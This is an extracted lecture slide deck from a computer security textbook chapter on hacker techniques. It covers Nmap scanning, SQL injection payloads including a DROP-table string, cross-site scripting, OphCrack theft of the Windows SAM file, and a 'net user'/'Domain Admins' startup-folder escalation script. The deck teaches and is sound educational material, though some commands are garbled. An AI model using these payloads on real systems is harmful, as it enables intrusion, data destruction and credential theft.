Computer Security

Fundamentals

by Chuck Easttom

Chapter 6 Techniques Used by Hackers

Chapter 6 Objectives

 Understand the basic methodology used by

hackers
 Be familiar with some of the basic tools
 Understand the hacking mentality

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 2

Introduction
 Basic Terminology
 White hat hacker (legal / ethical purposes,
black hat hacker or cracker (illegal
techniques), gray hacker (a former criminal
now turned ethical)
 Script kiddies (downloading of tools without
necessarily understanding them and
performing some criminal attacks)
 Phreaking (hacking into phone systems)

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 3

The Reconnaissance Phase
 Passive Scanning (does not require the
attacker to connect to the target system)
 Just by checking the target

organization’s websites (social

engineering, spear phishing, bulletin
boards, ads, etc.)
 Specific websites providing

information an attacker may find

useful

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 4

Netcraft.com Provides web server and web
hosting market-share analysis
including web server and OS
detection

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 5

Archive.org Non-profit library of millions of free
books, software, websites, etc.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 6

The Reconnaissance Phase (cont.)
 Active Scanning Techniques
 More reliable than passive scanning
techniques
 May be detected by the target system using
an intrusion detection system (IDS)

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 7

 1) Port Scanning
 Nmap (Network Mapper)

 Free tool, Probably the most

popular https://nmap.org/
Used to discover hosts and
services on a computer network by
sending packets and analyzing
responses

Written in C, C++, Python,

Lua,
Cross-platform (started as a NMAP GUI
Linux utility)
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 8
Scan Types
 Ping
 Connect
 Syn
 Fin

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 9

Ping Scan

 The ping scan sends a ping to the target port

(many network administrators block incoming
ICMP packets)
 A response from an active device returns an
ICMP echo reply, unless the IP address is not
available

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 10

Connect Scan

 Fully connect to the target IP address and

port
 Does a complete TCP handshake
 This is the most reliable but will absolutely be
detected

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 11

Syn Scan

 This scan is very stealthy

 Sends SYN (synchronize) requests to the
target to gather information about open ports
without completing the TCP handshake
process
 When an open port is identified, the TCP
handshake is reset before it can be completed.
This technique is sometimes called to as half-
open scan (never respond when the system send
a ACK/SYN)
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 12
Fin Scan

 Sends a FIN (finish) packet to target.

 If that port is not listening, no response.
 If it is listening an error response is received.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 13

NMAP Flags (Customizing the scan)
 -O detects operating system
 -sP is a ping scan
 -sT TCP connect scan
 -sS SYN scan
 -sF FIN scan

Examples
The most basic scan: nmap 192.168.1.1
Scan a range of IP addresses: nmap 192.168.1.1-20
Scan to detect the OS: nmap -O 192.168.1.1

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 14

2) Enumeration
 The process of finding out what is on the target system
 If an entire network: servers, workstations, printers,

etc.
 If a specific computer: users, shared folders, etc.

 Examples enumeration tools

 Sid2User
 Cheops (Linux only)
 UserInfo
 UserDump
 DumpSec
 Netcat
 NBTDump
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 15
Cain and Abel (one of the easiest to use)

Simply click on the Network tab and you

To
Cain and Abel GUI will find all the machines connected to
the network you are on
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 16
To Defend Against Scanning
 You should use the following techniques:
 Be careful how much information you put on the Internet
about your organization and its network.
 Make it a company policy that technical personnel who use
bulletin boards, chat rooms, and so on, for technical data
must not use their real name or reveal the company’s
name.
 Use an IDS that detects many scans.
 Block incoming Internet Control Message Protocol (ICMP)
packets.
 These won’t make scanning and reconnaissance
impossible on your system, but they will make certain the
attacker gathers significantly less information.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 17

Actual Attacks

 Now that we have discussed how attackers

scan a target system (reconnaissance
phase)
 Consider a few attacks that are commonly
used

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 18

1) SQL Injection

 One of the most common web attacks

 It is a code injection technique that might destroy
your database.
 It is the placement of malicious code in SQL
statements, via web page input.
 Depends on knowledge of SQL
 Basics are easy
 SQL injection usually occurs when you ask a user for input, like their
username/pass, and instead of a name/pass, the user gives you an SQL
statement that you will unknowingly run on your database

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 19

What is SQL?
 A relational database contains one or more tables
identified each by a name.
 Tables are relations
 Rows are records (tuples)
 Columns are attributes
 SQL (Structured Query Language) uses commands such
as SELECT, UPDATE, DELETE, INSERT, WHERE, and
others.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 20

More on SQL
 Web sites are written in some programming
language such as PHP, ASP, JSP, ASP.net
 Those programming languages have their own
syntax (not SQL)
 If you just place SQL statements directly in the

web page code, an error will be generated

 So programmers put the SQL statements into
the programming code for the web site in strings

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 21

More on SQL (Cont.)

Example: Consider the script that build an SQL query by

combining predefined strings with text entered by a user:

stringsSQLstatement;
sSQLstatement = “SELECT * FROM tblUsers WHERE UserName = ‘ “

+ txtUsername.Text + ” ’ AND Password = ‘ “ + txtPassword.Text + ” ’ ”

If you enter username = admin and the password = password, this code will
produce this SQL command
SELECT * FROM tblUsers WHERE UserName =‘admin’ AND Password =
‘password’
However whatever you type in, gets put into the text field.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 22

What Does This Cause?
 “SELECT * FROM tblUsers WHERE UserName = ‘ “
+ txtUsername.Text + ” ’ AND Password = ‘ “ + txtPassword.Text + ” ’ ”

Try username and password ' or ‘1' = ‘1

SELECT * FROM tblUsers WHERE UserName = ‘' or ‘1' =‘1’ AND

Password = ‘' or ‘1' =‘1’

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 23

Other Examples SQL Injection

“SELECT * FROM customers WHERE email =

‘$my_email’ ”

If the user maliciously inserts the simple

command x’ OR ‘x’ = ‘x into the form field for
my_email, we will get:

SELECT * FROM customers WHERE email =

‘x’ OR ‘x’ = ‘x ’
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 24
Other Examples SQL Injection (cont.)
“SELECT * FROM OrdersTable WHERE ShipCity =‘ “ + ShipCity
+”’”

If the user enters XYZ, then the following SQL is generated:

SELECT * FROM OrdersTable WHERE ShipCity = ‘XYZ’

What happens if the user maliciously inserts XYZ ’ ; DROP

OrdersTable --

SELECT * FROM OrdersTable WHERE ShipCity =‘ “ + XYZ ’ ;

DROP OrdersTable -- + ” ’

SELECT * FROM OrdersTable WHERE ShipCity =‘XYZ ’ ;

DROP OrdersTable --
25
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers
2) Cross Site Scripting

An attacker injects client-side script into web pages

viewed by other users. The term cross-site scripting
originally referred to the act of loading the attacked,
third-party web application from an unrelated attack site,
in a manner that executes a fragment of JavaScript
prepared by the attacker in the security context of the
targeted domain
Essentially you enter scripts into an area that other users
interact with. So that when they go to that part of the site,
you have your own script run, rather than the intended
Web site functionality. This can include redirecting them.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 26

Password Cracking
 A very popular tool for cracking Windows passwords is
OphCrack
 OphCrack can be downloaded from http://
ophcrack.sourceforge.net
 It is based on an understanding of how Windows
passwords work
 Windows passwords are stored in a hash file in one of
the system directories, usually C:\WINDOWS\ system32\
config\ in a SAM file
(SAM is an acronym for Security Accounts Manager)
 The passwords are stored as a hash (Hashes will be
discussed in detail in Chapter 8, “Encryption”)
© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 27
Password Cracking (Cont.)
 What Windows does is hash the password you
type in and compare it to the hash found in the
SAM file
 If there is a match, then you are logged in.
 To prevent someone from copying the SAM file
and taking it off to try to brute force it, as soon as
Windows begins the boot process, the OS locks
the SAM file
 What OphCrack does is boot to Linux and then
get the SAM file

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 28

OphCrack- How It Works
 Download OphCrack and burn the image to a
CD.
 Put the CD in the target computer and boot
through CD.
 It boots as Linux, grabs the Windows password
file, and then uses cracking tools to crack that
file and produces a text file with username and
passwords.
 You cannot even consider yourself a hacker
without this tool in your toolkit.

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 29

Malware Creation
 GUI tools
 Batch Files
 Writing your own

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 30

Malware Creation
 In Chapter 5, “Malware,” you saw the tool eLiTeWrap
 In this section you will see the tools used to actually
create viruses
 These tools allow the end user to click a few buttons and
create a virus
 There are websites that contain catalogs of malware
code
 Anyone with only moderate programming skills can download the
code for a virus and modify that malware for his specific needs
 You can think of this as a sort of cyber weapons proliferation
 There are even ransomware development kits

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 31

TeraBIT Virus Maker (can create some
rather damaging malware)

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 32

Other Attacks (Windows Hacking Techniques)
 Pass the hash
 If the attacker can obtain a valid
username and user password hashes
values then he can use that hash,
without ever knowing the actual
password (Pass the hash skips around
the application that performs the hash)

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 33

Other Attacks (Windows Hacking Techniques)
 Scripts (This particular exploit first requires access to the
target machine with at least guest-level privileges)

The attacker writes the following two-line script:

net user /domain /add localaccountname password
% net user command is used to add a user, delete a user,
set password for a user from windows command line
net group /domain "Domain Admins" /add Domain

Then he saves that script in the All Users startup folder.

The next time someone with domain admin privileges logs on
to the machine, it will execute and that localaccountname will
now be a domain admin

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 34

Penetration Testing (methodical probing of a
target network in order to identify weaknesses in the network)

 NIST 800-115
 NIST 800-115 is the National Institute of Standards and
Technology guideline for security assessments for Federal
Information Systems. Assessments include penetration tests.
NIST 800-115 describes security assessments
 Four phases:
 Planning: Set specific testing goals, related to pevious risk
assessment evaluations on the target network
 Discovery: Using of a variety of tools
 Attack: apply the discusses hacking techniques
 Reporting: Detailited report to the person who hired the
penetration tester

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 35

Penetration Testing (Contd.)
 National Security Agency Information Assessment
Methodology

 PCI Penetration Testing Standard

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 36